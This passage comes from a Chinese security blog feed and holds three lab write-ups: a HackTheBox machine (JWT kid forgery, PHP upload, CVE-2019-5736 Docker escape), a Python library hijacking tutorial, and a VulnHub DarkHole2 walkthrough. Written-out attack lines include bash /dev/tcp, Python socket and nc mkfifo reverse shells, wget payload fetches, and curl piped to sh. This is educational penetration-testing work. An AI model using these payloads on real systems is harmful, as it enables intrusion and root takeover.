<p>尝试注册admin发现用户已经存在了</p>
<p>注册登陆以后的功能就是<strong>notebook</strong>的笔记功能，类似于备忘录吧</p>
<p>简单测试一下似乎也不存在xss漏洞</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_xss.png" alt="xss"></p>
<p>发现F12 请求头里的cookie长得很像jwt</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_session.png" alt="session"></p>
<p>拿到<a href="https://jwt.io/%E5%8E%BB%E8%A7%A3%E7%A0%81%E4%B8%80%E4%B8%8B%EF%BC%8C%E6%9E%9C%E7%84%B6%E6%98%AFjwt">https://jwt.io/去解码一下，果然是jwt</a></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/jwt.png" alt="jwt"></p>
<p><strong>HEADER</strong>里的kid似乎是从本地7070端口获得一个密钥，7070的端口未开放</p>
<p><strong>PAYLOAD</strong>部分可以看到<code>admin_cap:0</code>，刚才注册时候已经发现admin用户被注册了</p>
<p>直接访问<code>xx/admin</code>发现报错Forbidden</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/forbidden.png" alt="forbidden"></p>
<p>参考：<a href="https://blog.pentesteracademy.com/hacking-jwt-tokens-kid-claim-misuse-key-leak-e7fce9a10a9c">https://blog.pentesteracademy.com/hacking-jwt-tokens-kid-claim-misuse-key-leak-e7fce9a10a9c</a></p>
<h2 id="伪造JWT令牌"><a href="#伪造JWT令牌" class="headerlink" title="伪造JWT令牌"></a>伪造JWT令牌</h2><p>思路比较清晰了，自己生成一个私钥对jwt签名，并将当前用户设置为管理员</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">openssl genrsa -out privKey.key 1024</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_privkey.png" alt="privkey"></p>
<p>用python3在本地起一个服务，让目标从本机获取私钥</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python3 -m http.server 7070</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/jwtfake.png" alt="jwtfake"></p>
<p>用生成的jwt令牌替换原来的，访问/<code>admin</code>，成功进入管理员界面</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_admin.png" alt="admin"></p>
<p>管理员界面有两个功能（查看Notes和文件上传）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/viewnote.png" alt="viewnote"></p>
<p>管理员能同时查看所有注册用户和Admin的notes，其中有两篇中泄露了部分信息供参考</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_php.png" alt="php"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/backups.png" alt="backups"></p>
<p>①存在PHP文件执行的问题需要解决 ②服务器上有备份</p>
<h2 id="GetShell"><a href="#GetShell" class="headerlink" title="GetShell"></a>GetShell</h2><p>如果可以运行php文件，那么我们可以通过PHP文件执行的问题来上传一个php文件反弹shell</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/uploadshell.png" alt="uploadshell"></p>
<p>上传shell.php查看文件成功收到反弹回来的shell，升级为交互式shell（关于交互式和非交互式shell的区别可以自行百度）</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">SHELL=/bin/bash script -q /dev/null -q参数为静默运行，输出到/dev/null（黑洞）里，如果不加script -q /dev/null不会新启一个bash，shell=/bin/bash只是设置shell为bash，加了以后会给你挂起一个新的shell，并帮你记录所有内容</span><br><span class="line">export TERM=xterm #运行xterm 一种终端</span><br><span class="line">ctrl+z #netcat挂后台</span><br><span class="line">stty raw -echo;fg #stty raw 设置原始输入 -echo 禁止回显，当您在键盘上输入时，并不出现在屏幕上 将本地终端置于原始模式，以免干扰远程终端</span><br><span class="line">reset #重置远程终端</span><br><span class="line">或者</span><br><span class="line">script /dev/null  //这是偷懒的方法，用起来不是很方便，但是像su之类的命令都可以执行</span><br><span class="line">或者</span><br><span class="line">python -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27; //需要python环境</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_%E4%BA%A4%E4%BA%92%E5%BC%8Fshell.png" alt="交互式shell"></p>
<p>查看<code>/etc/passwd</code>中看到有个<code>noah</code>用户</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/finduser.png" alt="finduser"></p>
<p>从上面我们可以发现已经提示过有备份文件，访问<code>/var/backups</code>，发现备份文件<code>home.tar.gz</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/findbackups.png" alt="findbackups"></p>
<p>因为目标服务器上有python3环境，可以起一个web服务，把备份文件<code>home.tar.gz</code>下载到本机</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/receivetar.png" alt="receivetar"></p>
<p>解压备份文件发现里面有<code>noah</code>用户的SSH密钥</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_idrsa.png" alt="idrsa"></p>
<p>通过SSH连接<code>10.10.10.230</code>，在桌面可以得到<code>user.txt</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/noah.png" alt="noah"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p><code>sudo -l</code>查看用户当前用户可执行的指令，用户可以不需要密码在docker容器执行部分命令</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_sudo.png" alt="sudo"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sudo docker exec -it webapp_dev01 xxx</span><br></pre></td></tr></table></figure>

<p>查看docker版本为<strong>18.06.0-ce</strong>,google搜一波发现了CVE-2019-5736docker容器逃逸漏洞</p>
<p>参考：</p>
<p><a href="https://github.com/Frichetten/CVE-2019-5736-PoC">https://github.com/Frichetten/CVE-2019-5736-PoC</a></p>
<p><a href="https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html">https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html</a></p>
<h3 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="漏洞概述"></a>漏洞概述</h3><p>runC是一个根据OCI(Open Container Initiative)标准创建并运行容器的CLI(command-line interface) 工具。runC是Docker中最为核心的部分，容器的创建、运行、销毁等操作最终都是通过调用runC完成。</p>
<p>CVE-2019-5736，导致18.09.2版本之前的Docker允许恶意容器覆盖宿主机上的runC二进制文件，由此使攻击者能够以root身份在宿主机上执行任意命令。恶意容器需满足以下两个条件之一:</p>
<p>(1)由一个攻击者控制的恶意镜像创建</p>
<p>(2)攻击者具有某已存在容器的写权限，且可通过docker exec进入。</p>
<p>POC的利用需要在容器内拥有root，由于覆盖了<code>/bin/sh</code>所以当我们把修改好Payload的二进制文件main下载到docker中执行，下次再有人调用docker容器中的<code>/bin/sh</code>就会触发Payload。</p>
<p>通过修改payload反弹一个shell到本机以获得root</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>1.SSH连接到目标主机，通过<code>sudo docker exec -it webapp-dev01 bash</code>在docker上执行命令，（暂且称之为SSH1）同时用另一个在另一个命令行窗口SSH连接到目标主机（SSH2）</p>
<p>2.在本地改好修改好Payload，执行<code>go build main.go</code>生成二进制文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">var payload = &quot;#!/bin/bash \n bash -i &gt;&amp; /dev/tcp/10.10.16.11/9999 0&gt;&amp;1&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/maingo.png" alt="maingo"></p>
<p>3.在二进制文件所在目录用python起一个web服务</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_webserver.png" alt="webserver"></p>
<p>4.在docker容器中执行命令从本机获取二进制文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">wget http://10.10.16.11:8000/main</span><br></pre></td></tr></table></figure>

<p>5.赋予二进制文件最高权限，并执行</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">chmod +x main &amp;&amp; ./main</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/ssh1main.png" alt="ssh1main"></p>
<p>6.监听9999端口（端口根据payload里面的来）</p>
<p>7.在SSH1中二进制文件运行并覆盖完成<code>/bin/sh</code>，SSH2执行如下命令即可收到反弹回来的shell</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sudo docker exec -it webapp-dev01 /bin/sh</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/ssh2.png" alt="ssh2"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_rootshell.png" alt="rootshell"></p>
<p>root.txt在<code>/root</code>目录下</p>
<p>如果流程看不懂，还有终极图解方便理解（文字表达能力较差，各位师傅多担待）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E5%85%A8%E5%B1%80.png" alt="全局"></p>
<p>可能出现问题的点估计就是提权了，我也好久弹不出Shell…</p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>HackTheBox</tag>
      </tags>
  </entry>
  <entry>
    <title>Python库劫持</title>
    <url>/2022/01/14/Python%E5%BA%93%E5%8A%AB%E6%8C%81/</url>
    <content><![CDATA[<h1 id="Python库劫持"><a href="#Python库劫持" class="headerlink" title="Python库劫持"></a>Python库劫持</h1><p>之前在做VulnHub的时候需要利用<strong>Python库劫持</strong>具体学习一下</p>
<span id="more"></span>

<h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>利用渗透环境中已有的python脚本来提权，该脚本可能引入了其他库，通过对引入文件的错误配置进行利用来提权。能应用到的场景还是有一定局限性</p>
<h2 id="Python脚本编写"><a href="#Python脚本编写" class="headerlink" title="Python脚本编写"></a>Python脚本编写</h2><p>我这里直接模仿靶机里的python脚本来写了，该脚本引入<strong>webbrowser</strong>模块，使用<strong>open</strong>函数打开baidu</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">import webbrowser</span><br><span class="line">print(&quot;welcome hacker~&quot;)</span><br><span class="line">webbrowser.open(&quot;https://www.baidu.com&quot;)</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113150511113.png" alt="image-20220113150511113"></p>
<p>看一下运行效果</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113150621602.png" alt="image-20220113150621602"></p>
<h2 id="场景一（写权限）"><a href="#场景一（写权限）" class="headerlink" title="场景一（写权限）"></a>场景一（写权限）</h2><p>该漏洞基于python脚本引入的模块文件的权限</p>
<p>当正在引入的模块文件的权限为任意用户可编辑时就会成为一个漏洞</p>
<h3 id="漏洞创建"><a href="#漏洞创建" class="headerlink" title="漏洞创建"></a>漏洞创建</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113154813928.png" alt="image-20220113154813928"></p>
<p>提前准备的<strong>hack.py</strong>引入了<strong>webbrowser</strong>模块，为了演示第一种漏洞利用，找到该模块文件并赋予任意用户可编辑权限</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">locate webbrowser.py</span><br><span class="line">sudo chmod 777 /usr/lib/python3.8/webbrowser.py</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113154213109.png" alt="image-20220113154213109"></p>
<p>接下来创建一种运行<strong>hack.py</strong>的方法，通过修改**/etc/sudoers**</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113155600081.png" alt="image-20220113155600081"></p>
<p>攻击者在远程连接后，可以通过如图方式来执行<strong>hack.py</strong></p>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>假设攻击者已经拿下了<strong>rabbit</strong>用户</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113160108886.png" alt="image-20220113160108886"></p>
<p><code>sudo -l</code>查看当前用户可执行的指令发现，可以以root免密执行<strong>hack.py</strong></p>
<p>读取<strong>hack.py</strong>的内容，其中引入了<strong>webbrowser</strong>库，<code>locate</code>定位<strong>webbrowser.py</strong>发现有很多</p>
<p>由于使用的是<strong>python3.8</strong>来执行脚本，查看**/usr/lib/python3.8/webbrowser.py**的权限</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113201726611.png" alt="image-20220113201726611"></p>
<p>为任意用户可写，此时有<strong>两种方式</strong>来获得root权限</p>
<blockquote>
<ol>
<li>直接在webbrowser.py中写入命令获取root的shell</li>
<li>webbrowser.py的open函数中写入命令，反弹shell获得root权限</li>
</ol>
</blockquote>
<h4 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">nano /usr/lib/python3.8/webbrowser.py</span><br><span class="line">os.system(&quot;/bin/bash&quot;) //写入的命令</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113202321662.png" alt="image-20220113202321662"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113202238717.png" alt="image-20220113202238717"></p>
<h4 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h4><p>在<strong>webbrowser.py</strong>定义open函数的地方写入</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<span class="string">&quot;ip&quot;</span>,port));os.dup2(s.fileno(),<span class="number">0</span>); os.dup2(s.fileno(),<span class="number">1</span>); os.dup2(s.fileno(),<span class="number">2</span>);p=subprocess.call([<span class="string">&quot;/bin/sh&quot;</span>,<span class="string">&quot;-i&quot;</span>]);</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113204427695.png" alt="image-20220113204427695"></p>
<p>在受害机上执行</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">sudo /usr/bin/python3.8 /home/wi11/hack.py</span><br></pre></td></tr></table></figure>

<p>接下来在Kali另起一个终端监听刚才写进去的端口</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">nc -lvvp 1234</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220113204122692.png" alt="image-20220113204122692"></p>
<p>成功反弹shell，权限为root</p>
<h2 id="场景二（优先顺序）"><a href="#场景二（优先顺序）" class="headerlink" title="场景二（优先顺序）"></a>场景二（优先顺序）</h2><p>该漏洞基于python脚本在导入模块时，python将按照特定的优先级顺序查找指定的模块文件</p>
<p>当你导入一个模块，Python 解析器对模块位置的搜索顺序是：</p>
<ol>
<li>当前目录</li>
<li>如果不在当前目录，Python 则搜索在 shell 变量 PYTHONPATH 下的每个目录。</li>
<li>如果都找不到，Python会察看默认路径。UNIX下，默认路径一般为/usr/local/lib/python/。</li>
</ol>
<p>如果<strong>可执行脚本所属者</strong>和<strong>攻击者获得的用户</strong>为同一用户，就可以在python脚本文件所属目录下创建一个模块文件，这样就会优先导入”伪造的模块“，最终实现提权</p>
<h3 id="漏洞创建-1"><a href="#漏洞创建-1" class="headerlink" title="漏洞创建"></a>漏洞创建</h3><p>首先把场景一中修改的**/usr/lib/python3.8/webbrowser.py**权限恢复原样</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114095634860.png" alt="image-20220114095634860"></p>
<p>修改**/etc/sudoers<strong>，场景一中我们设置的是</strong>rabbit<strong>用户，这次我们改为</strong>wi11**用户</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114095831722.png" alt="image-20220114095831722"></p>
<p>其他内容不变</p>
<h3 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h3><p>假设攻击者已经拿下了<strong>wi11</strong>用户</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114104814072.png" alt="image-20220114104814072"></p>
<p><code>sudo -l</code>查看当前用户可执行的指令发现，可以以root免密执行<strong>hack.py</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114105236849.png" alt="image-20220114105236849"></p>
<p>读取<strong>hack.py</strong>的内容，其中引入了<strong>webbrowser</strong>库，<code>locate</code>定位<strong>webbrowser.py</strong>发现有很多</p>
<p>由于使用的是<strong>python3.8</strong>来执行脚本，查看**/usr/lib/python3.8/webbrowser.py**的权限</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114104929691.png" alt="image-20220114104929691"></p>
<p>当前用户不可写，另寻出路</p>
<p>由于<strong>hack.py</strong>在**/home/wi11<strong>目录下，并且攻击者用</strong>wi11<strong>远程连接，</strong>可执行脚本所属者<strong>和</strong>攻击者获得的用户**为同一用户</p>
<p>此时可利用python在导入模块的优先顺序来获得root权限</p>
<p>在**/home/wi11<strong>目录下创建</strong>webbrowser.py**，内容为</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;ip&quot;,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114110116530.png" alt="image-20220114110116530"></p>
<p>接下来在Kali另起一个终端监听刚才写进去的端口，执行<strong>hack.py</strong>脚本</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114110438495.png" alt="image-20220114110438495"></p>
<p>成功反弹shell，权限为root</p>
<h2 id="场景三（Python-PATH环境变量）"><a href="#场景三（Python-PATH环境变量）" class="headerlink" title="场景三（Python PATH环境变量）"></a>场景三（Python PATH环境变量）</h2><p>此漏洞基于通过<strong>PYTHONPATH</strong>环境变量搜索Python库，当攻击者可以修改该变量，就会产生漏洞</p>
<h3 id="漏洞创建-2"><a href="#漏洞创建-2" class="headerlink" title="漏洞创建"></a>漏洞创建</h3><p>先把受害机所有配置还原为初始状态，删除**/home/wi11<strong>目录下的</strong>webbrowser.py**</p>
<p>修改**/etc/sudoers<strong>，这次使用</strong>rabbit<strong>用户并且添加</strong>SETENV**，允许sudo使用当前用户命令行中设置的环境变量</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114140349756.png" alt="image-20220114140349756"></p>
<h3 id="利用-2"><a href="#利用-2" class="headerlink" title="利用"></a>利用</h3><p>假设攻击者已经拿下了<strong>rabbit</strong>用户</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114141144288.png" alt="image-20220114141144288"></p>
<p><code>sudo -l</code>查看当前用户可执行的指令发现可以以root免密执行<strong>hack.py</strong>并且允许sudo设置环境变量</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114105236849.png" alt="image-20220114105236849"></p>
<p>读取<strong>hack.py</strong>的内容，其中引入了<strong>webbrowser</strong>库，<code>locate</code>定位<strong>webbrowser.py</strong>发现有很多</p>
<p>由于使用的是<strong>python3.8</strong>来执行脚本，查看**/usr/lib/python3.8/webbrowser.py**的权限</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114141929803.png" alt="image-20220114141929803"></p>
<p>没有写入权限，场景一方法不可用</p>
<p>还记得Python 解析器对模块位置的搜索顺序么？</p>
<p>第一优先级为python脚本当前目录，但是攻击者只获得了<strong>rabbit</strong>用户，而python脚本在**/home/wi11**目录下</p>
<p>第二优先级为Python搜索在shell变量<strong>PYTHONPATH</strong>下的每个目录，<strong>rabbit</strong>用户有权限通过sudo设置环境变量！</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114142141860.png" alt="image-20220114142141860"></p>
<p>在**/tmp<strong>目录下新建一个</strong>webbrowser.py**内容同场景二</p>
<p>接下来在Kali另起一个终端监听刚才写进去的端口，执行<strong>hack.py</strong>脚本并且设置<code>PYTHONPATH=/tmp/</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220114142447882.png" alt="image-20220114142447882"></p>
<p>成功反弹shell，权限为root</p>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>在开发调试时，能快捷方便的执行任务的重要性可能会优先于环境的安全性，但是调试完毕以后要及时恢复系统的各项配置，不然配置错误可能会导致更加严重后果</p>
]]></content>
      <tags>
        <tag>Python</tag>
        <tag>提权</tag>
      </tags>
  </entry>
  <entry>
    <title>VulnHub-DarkHole2</title>
    <url>/2022/01/20/VulnHub-DarkHole2/</url>
    <content><![CDATA[<h1 id="VulnHub-DarkHole2"><a href="#VulnHub-DarkHole2" class="headerlink" title="VulnHub-DarkHole2"></a>VulnHub-DarkHole2</h1><p><strong>Level: Medium-Hard</strong></p>
<span id="more"></span>

<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="netdiscover"><a href="#netdiscover" class="headerlink" title="netdiscover"></a>netdiscover</h3><p>本次的环境不同以往的点在于不知道目标的IP，所以先用netdiscover进行网络扫描</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">netdiscover -i 192.168.221.0/16</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120194130792.png" alt="image-20220120194130792"></p>
<p>发现目标IP为<strong>192.168.221.133</strong></p>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120194759005.png" alt="image-20220120194759005"></p>
<p>开放22、80端口，存在<strong>http-git</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120195541319.png" alt="image-20220120195541319"></p>
<p>直接访问发现<strong>Git泄露</strong></p>
<h3 id="git-dumper"><a href="#git-dumper" class="headerlink" title="git-dumper"></a>git-dumper</h3><p>类似的工具都行，主要是把.git目录down下来</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120201405775.png" alt="image-20220120201405775"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git log</span><br><span class="line">git diff a4d900a8d85e8938d3601f3cef113ee293028e10</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120202700671.png" alt="image-20220120202700671"></p>
<p>用git命令发现了邮箱以及密码</p>
<blockquote>
<p>Email：<a href="mailto:&#x6c;&#x75;&#115;&#x68;&#x40;&#97;&#x64;&#x6d;&#105;&#x6e;&#46;&#99;&#x6f;&#109;">&#x6c;&#x75;&#115;&#x68;&#x40;&#97;&#x64;&#x6d;&#105;&#x6e;&#46;&#99;&#x6f;&#109;</a></p>
<p>Password：321</p>
</blockquote>
<p>通过备份下来的文件可知存在登陆界面，利用获得的邮箱密码登录</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120203339458.png" alt="image-20220120203339458"></p>
<p>对GET参数id进行简单测试猜测可能存在SQL注入</p>
<h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h3><p><strong>Burpsuite</strong>抓包用<strong>sqlmap</strong>跑一下</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120204122563.png" alt="image-20220120204122563"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sqlmap -r test --dbs</span><br><span class="line">sqlmap -r test -D darkhole_2 --table</span><br><span class="line">sqlmap -r test -D darkhole_2 -T ssh --dump</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120204423858.png" alt="image-20220120204423858"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120205214748.png" alt="image-20220120205214748"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120205317753.png" alt="image-20220120205317753"></p>
<p>可以尝试SSH连接了</p>
<blockquote>
<p>user：jehad</p>
<p>password：fool</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220120210247227.png" alt="image-20220120210247227"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p><code>sudo -l</code>没有可利用脚本</p>
<p>返回上级目录发现了有另外两个用户<strong>lama</strong>和<strong>losy</strong>，不出意外需要获得它们的权限</p>
<p>使用<a href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS">LinPEAS</a>找一下受害机上潜在的提权方法</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh</span><br></pre></td></tr></table></figure>

<p>从LinePEAS收集到的信息中发现，<strong>losy</strong>用户localhost的9999端口运行了一个php服务</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220124162955923.png" alt="image-20220124162955923"></p>
<p>访问<code>/opt/web</code>目录</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220124163212182.png" alt="image-20220124163212182"></p>
<p>进行本地端口转发，这样就可以在本地访问<strong>index.php</strong>，再进行cmd传参</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">ssh jehad@192.168.221.133 -L 9999:localhost:9999</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220124164135872.png" alt="image-20220124164135872"></p>
<p>在<strong>losy</strong>用户目录下找到flag</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220124164601654.png" alt="image-20220124164601654"></p>
<h3 id="反弹Shell"><a href="#反弹Shell" class="headerlink" title="反弹Shell"></a>反弹Shell</h3><p>直接反弹shell似乎行不通，用工具对命令进行url编码成功反弹shell</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.221.128 1234 &gt;/tmp/f</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220124171444067.png" alt="image-20220124171444067"></p>
<p>可以用python起个bash</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python3 -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure>

<p>在<code>/home/losy</code>目录下发现了<code>.bash_history</code>查看内容</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/DarkHole2.png" alt="DarkHole2"></p>
<p>找到了<strong>losy</strong>的密码</p>
<blockquote>
<p>losy:gang</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220124173906401.png" alt="image-20220124173906401"></p>
<p>通过sudo可以使用root权限执行python3，用上面python起bash的命令就可以拿到root权限了</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sudo python3 -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220124174252068.png" alt="image-20220124174252068"></p>
<p>flag在<code>/root</code>目录下</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220124174353936.png" alt="image-20220124174353936"></p>
<p>end</p>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>在渗透中信息收集真的非常重要，第一次用LinPEAS工具，自动化的信息收集确实很方便</p>
<p>所知反弹shell的方法还是有所欠缺，需要后需加强学习</p>
<p>参考链接：<a href="https://www.jianshu.com/p/913067492f05">https://www.jianshu.com/p/913067492f05</a></p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>vulhub</tag>
      </tags>
  </entry>
  <entry>
    <title>Sqlmap-tamper</title>
    <url>/2022/02/23/Sqlmap-tamper/</url>
